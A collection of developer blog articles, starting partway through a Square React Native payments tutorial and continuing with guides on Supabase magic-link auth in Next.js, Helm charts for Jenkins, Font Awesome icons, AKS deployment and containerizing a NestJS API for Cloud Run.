If it’s your first time running, you’ll see a lot of output and the process will take a little while. Don’t worry, that’s normal. Ultimately, you should see the message `** BUILD SUCCEEDED **` and the process will exit cleanly.
Once that’s all complete, you should see our Super Cookie application loaded onto the virtual phone.

You might also have noticed that a new terminal window opened. This window is running the [Metro Bundler](https://facebook.github.io/metro/), a bundler created specifically for React Native that supports fast reloads and can handle thousands of modules at a time.
### Start the app - Android
The first step is to launch an AVD (Android Virtual Device) from Android Studio. This virtual device will run our React Native application.
1. Open Android Studio
2. On the welcome screen, click “Configure”
3. Click “AVD Manager”
4. In the modal that opens, find the device running API 28 (Android 9) that we created above.
5. Click on the green Play button in the “Actions” column to launch the device.
6. Click the power button on the top right next to the virtual device to boot it.
In a minute or two, you should reach the Home screen of the Android device.

With the simulator running, we can now launch our React Native application, which will attach itself to and run on the virtual device. Type this in your project directory and hit enter:
```bash
react-native run-android
```
If it’s your first time running the app, it may take some time to install dependencies. That’s normal. Once you see `BUILD SUCCESSFUL` and a clean process exit, the Super Cookie app should be running on the Android virtual device.

## Interacting with the app
Now that we’ve done all of this hard work installing dependencies and configuring our environment, let’s reward ourselves with a cookie. And not just any cookie - a Super Cookie 🍪 .
On either the running iOS or Android simulator app, click the green “Buy” button. This brings up a “Place your order” modal that contains example customer details, a price, and buttons that let the user choose how they want to pay: with a credit card or with a digital wallet like Apple Pay or Google Pay.

### Add a card on file
We’re going to pay with a stored credit card, so click ‘Pay with card’. We don’t have any cards on file yet for this customer, so you’ll see a message and an ‘Add card’ button.

Next, enter the details of a valid credit card and click ‘Save 🍪’.

If you entered a valid card, you’ll see a confirmation alert message. Otherwise you will see an error about what was invalid. When confirmed, the card will be attached to the record of the customer you created earlier.
**What happens behind the scenes?**
* The Square IAP SDK generates a nonce that represents the credit card.
* Our React Native application sends the nonce to our backend service running on Heroku.
* The backend service calls the [CreateCustomerCard](https://developer.squareup.com/docs/api/connect/v2#endpoint-customers-createcustomercard) endpoint of the Square API, passing the customer_id (from above) and the card nonce.
* The information returned from the Square API is stored in our React app’s state so the card type, expiration date and last 4 digits can be shown later.
_Tip: See the [Save Cards on File Cookbook](https://developer.squareup.com/docs/customers-api/cookbook/save-cards-on-file) to learn more about this flow._
**Important**: Always ask for explicit permission before saving customer contact information or cards on file. This is required by Square.
### Pay with a card on file
Assuming you successfully saved a card, you should now be able to see it on the previous UI. You can identify the card by its type, expiration date and by the last 4 digits of the account number.
_Note: The full card number cannot be shown because it was not returned from the CreateCustomerCard endpoint for privacy and security purposes._

Click the “Pay” button and then “Purchase” to confirm that you want to buy a Super Cookie for $1.

_Warning: Unless you're using the sandbox, this will charge your card and incur a transaction fee of $0.33; only $0.67 will be deposited into your linked account._
**What happens behind the scenes?**
* The app sends the customer ID and chosen card on file ID from the previous step to the backend service.
* The backend service creates a Payments API [Payment](https://developer.squareup.com/reference/square/payments-api/create-payment) request with the provided fields.
* The Square Payments API processes the request and returns a [Payment](https://developer.squareup.com/reference/square/objects/Payment) object that represents the captured payment, or an error message explaining what went wrong.
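To sketch what the second step looks like, here is the kind of request body the backend might assemble. The field names follow the Payments API's CreatePayment request, but `buildPaymentRequest` is an illustrative helper, not the quickstart backend's actual code:

```javascript
// Illustrative helper; field names follow the Payments API CreatePayment request.
function buildPaymentRequest({ customerId, cardId, idempotencyKey }) {
  return {
    source_id: cardId,               // the card-on-file ID chosen in the app
    customer_id: customerId,         // the customer the card is attached to
    idempotency_key: idempotencyKey, // unique per logical payment attempt
    amount_money: { amount: 100, currency: 'USD' }, // $1.00 Super Cookie, in cents
  };
}
```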
### Verify transactions on the dashboard
Now that the two payments have been processed, they will show up on your Square Dashboard. Visit the dashboard to confirm.
_> [View the Transactions page on your Square Dashboard](https://squareup.com/dashboard/sales/transactions)_
## Dig into the code
Now that you’ve seen how the flow works, let’s take a quick look at the code in the Super Cookie React Native application and see what’s happening.
It will first help to understand all of the different layers of the stack.
**On the device:**
- Super Cookie React Native Application
- React Native Plugin for In-App Payments
- Square In-App Payments SDK
**Server-side:**
- In-App Payments Server Quickstart (on Heroku)
- Square API
All of the custom code used in this tutorial lives inside either the Super Cookie application or IAP Server Quickstart. The Square IAP SDK and React Native Plugin for IAP are officially maintained packages from Square.
### React components
The Super Cookie quickstart application has one top-level component called `HomeScreen.js`. This component decides what is rendered based on the state of the application.
When the user first clicks ‘Buy’, a modal dialog appears from the bottom of the screen. The contents of the modal dialog change as the user walks through the flow. There are 3 views, backed by one component each:
* `OrderModal`: Shows transaction details and buttons for payment methods
* `CardsOnFileModal`: Shows list of cards on file and a button to add a card
* `PendingModal`: Shows an activity indicator when a transaction is being processed
The code for these components is in the `app/components` folder of the quickstart application repository. The main job of these components is to build markup for the interface, apply CSS, and trigger events when certain areas of the screen are touched.
### React Native IAP Plugin interfaces
Interaction with the React Native plugin and underlying native SDKs is set up in the HomeScreen component.
Up at the top of the files, we can see these interfaces being imported.
```javascript
import {
  SQIPCardEntry,
  SQIPApplePay,
  SQIPCore,
  SQIPGooglePay,
} from 'react-native-square-in-app-payments';
```
SQIPCore is used to send your Square application ID down to the native layer.
The `startCardEntryFlow()` method of SQIPCardEntry is used to show the dialog for capturing credit card details. This dialog is created by the underlying native SDK, so it's fast and smooth. The method accepts 3 parameters - a configuration object, a success function, and a cancel function. The success function is passed a nonce that represents the card that the user entered, which can then be used to create a transaction or store a card on file.
The `setIOSCardEntryTheme()` method is used to customize the look and feel of the dialog; that's how we added the 🍪 emoji to the “Save” button in the dialog. The `completeCardEntry()` method closes the dialog.
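To illustrate the call shape without a device, here's a runnable sketch that stubs out `SQIPCardEntry`. The real module is imported from `react-native-square-in-app-payments`, and the configuration option shown is illustrative; only the three-parameter shape is the point here:

```javascript
// STAND-IN object so the call shape can be shown and run outside React Native;
// the real SQIPCardEntry comes from 'react-native-square-in-app-payments'.
const SQIPCardEntry = {
  async startCardEntryFlow(config, onSuccess, onCancel) {
    // The native SDK would present its card entry UI here; this stub just
    // "succeeds" immediately with a fake nonce.
    onSuccess({ nonce: 'cnon:fake-card-nonce' });
  },
};

let receivedNonce = null;
SQIPCardEntry.startCardEntryFlow(
  { collectPostalCode: true },                             // configuration object
  (cardDetails) => { receivedNonce = cardDetails.nonce; }, // success handler
  () => { /* user cancelled card entry */ },               // cancel handler
);
```

In a real app, the success handler is where you would send the nonce to your backend.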
See the [React Native plugin’s technical reference](https://github.com/square/in-app-payments-react-native-plugin/blob/master/docs/reference.md) for a full list of interfaces, features and customizations that your application can take advantage of.
## Conclusion
In this tutorial, we’ve shown how to take a Card on File payment within a React Native application, using the [Square In-App Payments SDK](https://squareup.com/us/en/developers/in-app-payments) and the [React Native Plugin for In-App Payments SDK.](https://github.com/square/in-app-payments-react-native-plugin)
Even if you’re not selling super cookies, the instructions and example code here should help you integrate Square into your React Native application to create a great user experience for whatever you’re selling.
Once you’re ready to do that, your next step will be to read the [Getting Started with the React Native Plugin for In-App Payments SDK](https://github.com/square/in-app-payments-react-native-plugin/blob/master/docs/get-started.md) guide on GitHub, which shows you step-by-step how to add the plugin to an existing React Native app. Square Developer Evangelist [Richard Moot](https://twitter.com/wootmoot) has even created a video to walk you through it step-by-step.
{% youtube PoVuik5jqxI %}
If you want to keep up to date with the rest of our guides and tutorials, be sure to follow our [blog](https://medium.com/square-corner-blog) & our [Twitter](https://twitter.com/SquareDev) account, and sign up for our [forums](https://developer.squareup.com/forums).
Thanks for reading!
---
title: Magic Link Authentication and Route Controls with Supabase and Next.js
published: true
description: In this post, we'll build out a Next.js app that enables navigation, authentication, authorization, redirects (client and server-side), and a profile view.
tags: webdev, javascript, react, nextjs
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hh20qf2iasphmrzk93h6.png
---
> View the video tutorial of this guide [here](https://www.youtube.com/watch?v=oXWImFqsQF4). As a disclaimer, Supabase is also a sponsor of my YouTube channel.
While [Supabase](https://supabase.io/) is widely known for their real-time database and API layer, one of the things I like about it is the number of easy to set up [authentication mechanisms](https://supabase.io/docs/guides/auth) it offers out of the box.

### Magic Link
One of my favorites is Magic Link. You've probably used magic link in the past: the user receives an email containing a custom URL with an access token that authenticates them with the service.
When the user visits the URL, a session is set in their browser storage and the user is redirected back to the app, authenticating the user in the process.
This is becoming a very popular way to authenticate users as they do not have to keep up with another password, and it provides a really great user experience.
### Next.js
With Next.js, you have the ability to not only protect routes with client-side authorization, but for added security you can do server-side authorization and redirects in [`getServerSideProps`](https://nextjs.org/docs/basic-features/data-fetching#getserversideprops-server-side-rendering) if a cookie has been set and is available in the request context.
This is also where Supabase comes in handy. There is built-in functionality for setting and getting the cookie for the signed in user in SSR and API routes:
#### Setting the user in an API route
```javascript
import { supabase } from '../../client'

export default function handler(req, res) {
  supabase.auth.api.setAuthCookie(req, res)
}
```
#### Getting the user in an SSR or API route
```javascript
export async function getServerSideProps({ req }) {
  const { user } = await supabase.auth.api.getUserByCookie(req)
  if (!user) {
    return {
      props: {}
    }
  }
  /* if user is present, do something with the user data here */
  return { props: { user } }
}
```
Server-side redirects are typically preferred over client-side redirects from an SEO perspective - it's harder for search engines to understand how client-side redirects should be treated.
You are also able to access the user profile from an API route using the `getUserByCookie` function, opening up an entirely new set of use cases and functionality.
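As a sketch of what that enables, the decision logic of such an API route could look like the following. `profileResponse` is a hypothetical helper, not code from this post; it just captures how a route might respond based on whatever `getUserByCookie` returned:

```javascript
// Hypothetical helper: given the user returned by getUserByCookie (or null),
// decide what an API route should respond with.
function profileResponse(user) {
  if (!user) {
    return { status: 401, body: { error: 'Not signed in' } };
  }
  return { status: 200, body: { id: user.id, email: user.email } };
}
```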
With Next.js and Supabase you can easily implement a wide variety of applications using this combination of SSG, SSR, and client-side data fetching and user authorization, making the combination (and any framework that offers this combination of capabilities) extremely useful and powerful.
### What we'll be building
In this post, we'll build out a Next.js app that enables navigation, authentication, authorization, redirects (client and server-side), and a profile view.
The project that we'll be building is a great starting point for any application that needs to deal with user identity, and is a good way to understand how user identity works and flows throughout all of the different places in a project using a modern hybrid framework like Next.js.
> The final code for this project is located [here](https://github.com/dabit3/supabase-nextjs-auth)
## Building the app
To get started, you first need to create a Supabase account and project.
To do so, head over to [Supabase.io](https://supabase.io) and click __Start Your Project__. Authenticate with GitHub and then create a new project under the organization that is provided to you in your account.

Give the project a Name and Password and click Create new project.
It will take approximately 2 minutes for your project to be created.
Next, open your terminal and create a new Next.js app:
```sh
npx create-next-app supabase-next-auth
cd supabase-next-auth
```
The only dependency we'll need is the [`@supabase/supabase-js`](https://github.com/supabase/supabase-js) package:
```sh
npm install @supabase/supabase-js
```
### Configuring the Supabase credentials
Now that the Next.js app is created, it needs to know about the Supabase project in order to interact with it.
The best way to do this is using environment variables. Next.js allows environment variables to be set by creating a file called __.env.local__ in the root of the project and storing them there.
In order to expose a variable to the browser you have to prefix the variable with `NEXT_PUBLIC_`.
Create a file called __.env.local__ at the root of the project, and add the following configuration:
```
NEXT_PUBLIC_SUPABASE_URL=https://app-id.supabase.co
NEXT_PUBLIC_SUPABASE_ANON_KEY=your-public-api-key
```
You can find the values of your API URL and API Key in the Supabase dashboard settings:

### Creating the Supabase client
Now that the environment variables have been set, we can create a Supabase instance that can be imported whenever we need it.
Create a file named __client.js__ in the root of the project with the following code:
```javascript
/* client.js */
import { createClient } from '@supabase/supabase-js'
const supabase = createClient(
  process.env.NEXT_PUBLIC_SUPABASE_URL,
  process.env.NEXT_PUBLIC_SUPABASE_ANON_KEY
)

export { supabase }
```
### Updating the __index__ page
Next, let's update __pages/index.js__ to be simpler than what is provided out of the box. This is just meant to serve as a basic landing page.
```javascript
/* pages/index.js */
import styles from '../styles/Home.module.css'
export default function Home() {
  return (
    <div className={styles.container}>
      <main className={styles.main}>
        <h1 className={styles.title}>
          Hello World!
        </h1>
      </main>
    </div>
  )
}
```
### Creating the sign in screen
Next, let's create the Sign In screen. This will render a form input for the user to provide their email address.
When the user submits the form, they will receive a magic link to sign in. This will work for both new as well as existing users!
Create a new file in the __pages__ directory named __sign-in.js__:
```javascript
/* pages/sign-in.js */
import { useState } from 'react'
import styles from '../styles/Home.module.css'
import { supabase } from '../client'
export default function SignIn() {
  const [email, setEmail] = useState('')
  const [submitted, setSubmitted] = useState(false)
  async function signIn() {
    const { error, data } = await supabase.auth.signIn({
      email
    })
    if (error) {
      console.log({ error })
    } else {
      setSubmitted(true)
    }
  }
  if (submitted) {
    return (
      <div className={styles.container}>
        <h1>Please check your email to sign in</h1>
      </div>
    )
  }
  return (
    <div className={styles.container}>
      <main className={styles.main}>
        <h1 className={styles.title}>
          Sign In
        </h1>
        <input
          onChange={e => setEmail(e.target.value)}
          style={{ margin: 10 }}
        />
        <button onClick={() => signIn()}>Sign In</button>
      </main>
    </div>
  )
}
```
The main thing in this file is this line of code:
```javascript
const { error, data } = await supabase.auth.signIn({
  email
})
```
By only providing the email address of the user, magic link authentication will happen automatically.
### Profile view
Next, let's create the profile view. Create a new file in the __pages__ directory named __profile.js__:
```javascript
/* pages/profile.js */
import { useState, useEffect } from 'react';
import { supabase } from '../client'
import { useRouter } from 'next/router'
export default function Profile() {
  const [profile, setProfile] = useState(null)
  const router = useRouter()
  useEffect(() => {
    fetchProfile()
  }, [])
  async function fetchProfile() {
    const profileData = await supabase.auth.user()
    if (!profileData) {
      router.push('/sign-in')
    } else {
      setProfile(profileData)
    }
  }
  async function signOut() {
    await supabase.auth.signOut()
    router.push('/sign-in')
  }
  if (!profile) return null
  return (
    <div style={{ maxWidth: '420px', margin: '96px auto' }}>
      <h2>Hello, {profile.email}</h2>
      <p>User ID: {profile.id}</p>
      <button onClick={signOut}>Sign Out</button>
    </div>
  )
}
```
To check for the currently signed in user we call `supabase.auth.user()`.
If the user is signed in, we set the user information using the `setProfile` function set up using the `useState` hook.
If the user is not signed in, we client-side redirect using the `useRouter` hook.
### API Route
In __pages/_app.js__ we'll need to call a function that sets the cookie so it can be retrieved later in the SSR route.
Let's go ahead and create that API route and function. This will be calling the `setAuthCookie` API given to us by the Supabase client.
Create a new file named __auth.js__ in the __pages/api__ folder and add the following code:
```javascript
/* pages/api/auth.js */
import { supabase } from '../../client'

export default function handler(req, res) {
  supabase.auth.api.setAuthCookie(req, res)
}
```
### Nav, auth listener, and setting the session cookie
The largest chunk of code we'll need to write is in __pages/_app.js__. Here are the things we need to implement:
1. Navigation
2. A listener to fire when authentication state changes (provided by Supabase)
3. A function that will set the cookie with the user session
In addition to this, we'll also need to keep up with the authenticated state of the user. We do this so we can toggle links, showing or hiding certain links based on if the user is or isn't signed in.
We'll demonstrate this here by only showing the __Sign In__ link to users who are not signed in, and hiding it when they are.
```javascript
/* pages/_app.js */
import '../styles/globals.css'
import { useState, useEffect } from 'react'
import Link from 'next/link'
import { supabase } from '../client'
import { useRouter } from 'next/router'
function MyApp({ Component, pageProps }) {
  const router = useRouter()
  const [authenticatedState, setAuthenticatedState] = useState('not-authenticated')
  useEffect(() => {
    /* fires when a user signs in or out */
    const { data: authListener } = supabase.auth.onAuthStateChange((event, session) => {
      handleAuthChange(event, session)
      if (event === 'SIGNED_IN') {
        setAuthenticatedState('authenticated')
        router.push('/profile')
      }
      if (event === 'SIGNED_OUT') {
        setAuthenticatedState('not-authenticated')
      }
    })
    checkUser()
    return () => {
      authListener.unsubscribe()
    }
  }, [])
  async function checkUser() {
    /* when the component loads, checks user to show or hide Sign In link */
    const user = await supabase.auth.user()
    if (user) {
      setAuthenticatedState('authenticated')
    }
  }
  async function handleAuthChange(event, session) {
    /* sets and removes the Supabase cookie */
    await fetch('/api/auth', {
      method: 'POST',
      headers: new Headers({ 'Content-Type': 'application/json' }),
      credentials: 'same-origin',
      body: JSON.stringify({ event, session }),
    })
  }
  return (
    <div>
      <nav style={navStyle}>
        <Link href="/">
          <a style={linkStyle}>Home</a>
        </Link>
        <Link href="/profile">
          <a style={linkStyle}>Profile</a>
        </Link>
        {
          authenticatedState === 'not-authenticated' && (
            <Link href="/sign-in">
              <a style={linkStyle}>Sign In</a>
            </Link>
          )
        }
        <Link href="/protected">
          <a style={linkStyle}>Protected</a>
        </Link>
      </nav>
      <Component {...pageProps} />
    </div>
  )
}

const navStyle = {
  margin: 20
}
const linkStyle = {
  marginRight: 10
}

export default MyApp
```
The last page we need to implement is the route that will demonstrate server-side protection and redirects.
Since we have already implemented setting the cookie, we should now be able to read the cookie on the server if the user is signed in.
Like I mentioned previously, we can do this with the `getUserByCookie` function.
Create a new file in the __pages__ directory named __protected.js__ and add the following code:
```javascript
import { supabase } from '../client'

export default function Protected({ user }) {
  console.log({ user })
  return (
    <div style={{ maxWidth: '420px', margin: '96px auto' }}>
      <h2>Hello from protected route</h2>
    </div>
  )
}

export async function getServerSideProps({ req }) {
  /* check to see if a user is set */
  const { user } = await supabase.auth.api.getUserByCookie(req)
  /* if no user is set, redirect to the sign-in page */
  if (!user) {
    return { redirect: { destination: '/sign-in', permanent: false } }
  }
  /* if a user is set, pass it to the page via props */
  return { props: { user } }
}
```
## Testing it out
Now the app is built and we can test it out!
To run the app, open your terminal and run the following command:
```sh
npm run dev
```
When the app loads, you should be able to sign up, and sign in using the magic link. Once signed in, you should be able to view the profile page and see your user id as well as your email address.
### Setting metadata and attributes
If you want to continue building out the user's profile, you can do so easily using the `update` method.
For example, let's say we wanted to allow users to set their location. We can do so with the following code:
```javascript
const { user, error } = await supabase.auth.update({
  data: {
    city: "New York"
  }
})
```
Now, when we fetch the user's data, we should be able to view their metadata:

> The final code for this project is located [here](https://github.com/dabit3/supabase-nextjs-auth)
---
title: Moving fast, it’s more than breaking things
published: true
description:
tags: movefast,
//cover_image: https://direct_url_to_image.jpg
---
I’ve been thinking about the saying “move fast and break things” lately. First, [Armory](https://www.armory.io/)’s CEO, DROdio, did a tech talk with [LaunchDarkly](https://launchdarkly.com/), [Pulumi](https://pulumi.com/), and [SD Times](https://sdtimes.com): [Move Fast & DON’T Break Things: Modernize Your SDLC without Compromising Customer Trust](https://sdtimes.com/move-fast-dont-break-things-modernize-your-sdlc-without-compromising-customer-trust/). The talk really resonated with me for a number of reasons:
* It really did a great job of spelling out the importance of getting code out - and the cost for not doing so. Equating code to inventory and having to watch to ensure that it doesn’t go stale, was a really great way to frame this. It’s always a challenge to balance the tech debt with the new things. Who wants to work on redoing something you’ve already done when you can be working on something new and exciting?
* It highlighted why you have to move - it is not an option not to. Think of all of your inventory rotting and going bad. You can’t continue to build or rely on a base that is not strong enough to support what you are doing.
* And most of all, it highlights the thinking and challenges that companies that are enabling businesses to move fast are looking at and addressing.
On the other hand, I’ve been listening to the [podcast](https://softwareengineeringdaily.com/2021/07/11/full-audiobook-move-fast-how-facebook-builds-software/) as well as [reading the book](https://www.amazon.com/Move-Fast-Facebook-Builds-Software-ebook/dp/B093HMJ4KB) from [Software Daily’s Jeff Meyerson](https://softwareengineeringdaily.com/tag/jeff-meyerson/) on how Facebook builds software. This had a lot of similarities and also a lot of ideas in it that illustrated how Facebook has been so successful as an engineering organization.
I was at Heroku for four years and one of the things that really inspired me more than anything, is what Heroku customers were able to do with Heroku - and how quickly. When the pandemic hit, I witnessed story after story - and even helped tell a few of them - on how companies pivoted, how people created apps/solutions to help their neighborhoods or others in need, and the list goes on.
The number of disruptive businesses that were able to join the market with great success, as they were born in the cloud, just keeps growing.
I watch all of this and part of me laments for the “mom and pop” stores and a simpler time, but the larger part of me is constantly amazed by the great minds and innovation that are touching all of us in so many industries and so many different ways.
So, why does move fast resonate with me so much? Yes, it’s all of the above, but even more than that, I have come to realize that I am happiest and at home in environments and cultures that do move fast, that aren’t afraid to try new things, but ones that are ensuring that none of it is at the expense of the customer.
I’ve always loved this quote from Mark Twain:
> “I didn't have time to write a short letter, so I wrote a long one instead.”
Sometimes you do have to start with the long letter - or the MVP. But when things matter, moving fast doesn’t have to mean that the short letter can’t be written or shouldn’t be written... all good things take the right amount of time. The world moves fast, and I have to say that I am quite happy to be moving as fast as I can to stay on the ride.
<center>

<caption><a href="https://giphy.com/gifs/trippy-space-photos-3oFzm4qdAdgWjTBidG">via GIPHY</a></caption></center>
| justjenu |
757,779 | Helm: Kubernetes package manager | What is Helm ?? Helm is the first application package manager running atop Kubernetes. It... | 0 | 2021-09-25T06:29:29 | https://dev.to/piyushbagani15/helm-kubernetes-package-manager-4ocb | kubernetes, helm, charts, devops |
## What is Helm?
Helm is the first application package manager running atop Kubernetes. It allows describing the application structure through convenient helm-charts and managing it with simple commands.
Helm provides the same basic feature set as many of the package managers you may already be familiar with, such as Debian’s apt, or Python’s pip.
Helm can:
- Install software.
- Automatically install software dependencies.
- Upgrade software.
- Configure software deployments.
- Fetch software packages from repositories.
Helm helps you manage Kubernetes applications. Helm charts help you install, manage, and upgrade even the most complex applications. Helm is a third-party tool that manages Kubernetes packages.
A package in Kubernetes is known as a chart. We can either download charts from a repository or create our own custom chart.
### In this article we will create our own custom chart.
For this, we'll use AWS Cloud to set up the Kubernetes master and slave. If you are interested in setting up this cluster, you can read another of my [blogs](https://dev.to/piyushbagani15/configuring-kubernetes-multinode-cluster-over-aws-using-ansible-2fhe).
### Here We'll integrate Jenkins with Helm.

### Installing Helm
We have to install Helm on the client side. The most common and preferred way is to install it from the binary.
Here is the link for downloading the binary of Helm version 3:
https://get.helm.sh/helm-v3.5.2-linux-amd64.tar.gz

Extract the archive and copy the `linux-amd64/helm` binary to `/usr/bin/`.
We can check the version of Helm with the command below.
`helm version`
After setting up K8s Cluster let’s start creating our own custom charts. Create a workspace where we will create Charts.

The configuration file for the chart is Chart.yaml. We have to create Chart.yaml, and it must have a capital ‘C’.
Content inside Chart.yaml is as follows

Create a `templates` directory inside your workspace.

Next, we can create deployment.yaml with the command provided below. In this deployment we are using the Jenkins image. The YAML code for deployment.yaml will look as below.

Now let's install the Helm chart.

Let’s check whether the pods are running. We can also verify that no services are running apart from the default `kubernetes` service of type ClusterIP.


Now we will expose the Jenkins server; the service.yaml is as below.

Let’s see whether the new service has launched.

Now we can check whether our Jenkins server is publicly accessible by visiting `http://public_ip_address:exposed_port`.

To get the password of the running Jenkins server, we will log in to the pod and view the file that contains it.
The location of the password file is `/var/jenkins_home/secrets/initialAdminPassword`.

Now we can copy the password from that file and paste it into the page shown above.

Voila, we did it! You can now configure it further according to your requirements.
### That’s all for now.
### Thanks for reading the Article.
### Happy Helming!
| piyushbagani15 |
757,786 | Adding Social Media icons in HTML | If you are new to web development, you might have wondered how to add social media icons to your... | 0 | 2021-07-13T05:42:38 | https://dev.to/anjalijha22/adding-social-media-icons-in-html-o9 | beginners, html, webdev |
If you are new to web development, you might have wondered how to add social media icons to your website to help expand its reach and connectivity. I figured it out just a few days ago.
There are various options, but I used a popular toolkit called Font Awesome.
#### Step 1:
To get started, open the link below-
https://fontawesome.com/
#### Step 2:
Click on "Start for Free" and enter your email address to receive a kit code. You will receive a confirmation email for setting up your account.
#### Step 3:

You will be greeted with a kit code, which needs to be copied and pasted in the head section of your HTML.
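As a sketch, the kit code is a single script tag along these lines (the kit URL below is a placeholder; use the exact one from your own Font Awesome account):

```html
<script src="https://kit.fontawesome.com/yourkitcode.js" crossorigin="anonymous"></script>
```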
#### Step 4:
You can now browse any of the icons on the Font Awesome webpage. Select the icon you wish to use and copy the associated HTML code. Paste this code into your HTML page and you will see the icon you chose.
To increase or decrease the size of the icon you can just manipulate your code a little.
```
<i class="fab fa-twitter"></i>
```
The size of the above icon can be enlarged by -
```
<i class="fab fa-twitter fa-5x"></i>
```
or
```
<i class="fab fa-twitter fa-6x"></i>
```
Hope you get the idea!!!!
| anjalijha22 |
778,686 | Deploy to Azure Kubernetes (AKS) from Azure DevOps with Azure Pipelines | Do you want to Deploy to Azure Kubernetes (AKS) from Azure DevOps, but you don't know where to start?... | 0 | 2021-08-02T01:24:32 | https://dev.to/n3wt0n/deploy-to-azure-kubernetes-aks-from-azure-devops-with-azure-pipelines-37b2 | azure, azuredevops, aks, kubernetes |
Do you want to __Deploy to Azure Kubernetes (AKS) from Azure DevOps__, but you don't know where to start? This is for you!
In this live stream, part of the "_Build Live with Me_" series, I'm going to deploy an application to Azure Kubernetes Service (AKS) via Azure DevOps using Azure Pipelines from scratch, live!
You will learn how to set up the __integration with AKS__, and how to __deploy everything__ to Kubernetes in Microsoft Azure using Azure Pipelines.
{% youtube 4Oa5HneTuKs %}
[Link to the video: https://youtu.be/4Oa5HneTuKs](https://youtu.be/4Oa5HneTuKs)
See you there!
__Like, share and follow me__ 🚀 for more content:
📽 [YouTube](https://www.youtube.com/CoderDave)
☕ [Buy me a coffee](https://buymeacoffee.com/CoderDave)
💖 [Patreon](https://patreon.com/CoderDave)
🌐 [CoderDave.io Website](https://coderdave.io)
👕 [Merch](https://geni.us/cdmerch)
👦🏻 [Facebook page](https://www.facebook.com/CoderDaveYT)
🐱💻 [GitHub](https://github.com/n3wt0n)
👲🏻 [Twitter](https://www.twitter.com/davide.benvegnu)
👴🏻 [LinkedIn](https://www.linkedin.com/in/davidebenvegnu/)
🔉 [Podcast](https://geni.us/cdpodcast)
<a href="https://www.buymeacoffee.com/CoderDave" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png" alt="Buy Me A Coffee" style="height: 30px !important; width: 108px !important;" ></a>
| n3wt0n |
778,817 | Deploying NestJS API to Cloud Run using Cloud Build | NestJS is a NodeJS framework and deploying NodeJS API sometimes can be so challenging. Let's say for... | 0 | 2021-08-02T04:34:23 | https://dev.to/ajipandean/deploy-nestjs-api-to-cloud-run-using-cloud-build-66a | node, nestjs, cloudrun, api |
NestJS is a NodeJS framework, and deploying a NodeJS API can sometimes be challenging. Let's say, for example, you have a VPS ready to be the place for your API to live. When you want to deploy your API to that VPS, there is a lot of work to do. It starts with setting up the environment for developing the API, then developing the actual API, configuring a process manager like PM2, configuring a web server like nginx, and so on. After a lot of work, your app is finally ready to serve.
Well, maybe some of you are already used to it, so it doesn't seem that complicated. But what about beginner programmers? They definitely get intimidated by those steps (just like me in the past) :D. So if you feel the same as I did, then you're in the right place.
Fortunately, at Google Cloud Next 2019, Google announced a serverless service where you can deploy your NodeJS API easily without worrying about the ton of steps above. This service is called Cloud Run.
Cloud Run basically is a fully-managed and highly scalable platform for deploying containerized app. Where "fully-managed" here means that Google takes care of the server for you, so you don't have to worry about managing and maintaining the server, and "highly scalable" here means that your service will be either increased or decreased dynamically based on the traffic to that service.
In this article, I will show you how to deploy a NodeJS API built with NestJS to Google Cloud Run. We will use Docker to containerize our application, so I assume that you have a bit of knowledge about Docker, or at least have heard of it.
So, let's get started.
---
## Create NestJS API
So first of all, let's create our brand new NestJS app by simply run the command below on your Terminal or Command Prompt for Windows.
```bash
$ npm i -g @nestjs/cli
$ nest new <your-app-name>
```
After it finished, as you can see, there are a bunch of files generated automatically by NestJS. We are not going to touch any of these files. Instead, we want to test the API by simply running the command below.
```bash
$ yarn start:dev # if you choose yarn
$ npm run start:dev # if you choose npm
```
Then you can visit [http://localhost:3000](http://localhost:3000) in your favorite browser, and you should see `Hello, world` showing up on the screen.
---
## Containerize NestJS API
As I mentioned before, Cloud Run is a service for deploying containerized apps. That means we should bundle our API into a container using Docker (it can be anything actually, but Docker is the most popular one) and then deploy that container to Cloud Run.
So in case you don't know what a container is: basically, a container bundles our API along with its dependencies and environment, so the API that runs on Cloud Run has the same dependencies and environment as the API that runs on our local machine.
Okay enough theory, let's containerize our API.
So the first thing that we have to do for containerizing our API is creating a file called `Dockerfile` in the root of our project directory. Then just copy and paste code below into `Dockerfile`.
```docker
FROM node:erbium-alpine3.14
WORKDIR /app
COPY package.json .
RUN yarn
COPY . .
RUN yarn build
EXPOSE 3000
CMD [ "yarn", "start:prod" ]
```
Let's take a look of what we just did here.
We just created a `Dockerfile`, which Docker requires to build an image from the instructions we wrote in that file.
Inside the `Dockerfile` we have a lot of stuff going on, let's cover them one by one.
1. `FROM node:erbium-alpine3.14` tells Docker that we are going to use node:erbium-alpine3.14 as our base image. So here, we don't have to install & configure NodeJS manually by ourselves.
2. `WORKDIR /app` tells Docker to create a directory called `/app` and redirect us to that directory. It basically quite similar to `mkdir /app && cd /app`.
3. `COPY package.json .` tells Docker to copy package.json file from our project on local computer to `/app` directory inside our container.
4. `RUN yarn` tells Docker to install all dependencies needed for our API.
5. `COPY . .` tells Docker to copy all files from our project on local computer to `/app` directory inside our container.
6. `RUN yarn build` tells Docker to build our API.
7. `EXPOSE 3000` tells Docker to open port 3000 for external access.
8. `CMD [ "yarn", "start:prod" ]` tells Docker to execute this command whenever we run our image.
Okay, we've created our `Dockerfile`, but we still don't have an image yet. Before we build one, since we are building a NestJS app, which is literally NodeJS, we have to prevent `node_modules` from being copied during the build, because `node_modules` is quite big and copying it can slow down the image build.
In order to ignore some files or folders, we have to create another file called `.dockerignore` in the root of our project folder. After that, just copy and paste code below into `.dockerignore`.
```bash
node_modules/
.git/
```
Now we're ready to build our image. To build a Docker image, we just have to run the command below.
```bash
$ docker build -t <image_name:tag> .
```
Let's cover above command one by one.
1. `docker build` tells Docker to build our image based on Dockerfile.
2. `-t <image_name:tag>` specifies the name of the image and also a tag (for versioning purposes).
3. `.` this 'dot' refers to the current directory, where Docker will look for the Dockerfile to build the image.
Now you can test your image by running `docker run` command.
```bash
$ docker run -it -p 3000:3000 <image-name:tag>
```
Then you can visit [http://localhost:3000](http://localhost:3000) and you should see the same result as before. But now your app runs in a Docker container.
To stop the running container, just hit `Ctrl + c`.
---
## Host our code to GitHub
Before we deploy our code to Cloud Run, let's first host it on GitHub so that we can clone it into Google Cloud Shell to perform the deployment. You can do it by yourself, but in case you don't know how, just copy and paste the commands below and run them in your terminal.
```bash
$ git init
$ git add .
$ git commit -m "my api project, finished"
$ git remote add origin <your-repository-url>
$ git branch -M main
$ git push origin main
```
---
## Deploy to Cloud Run
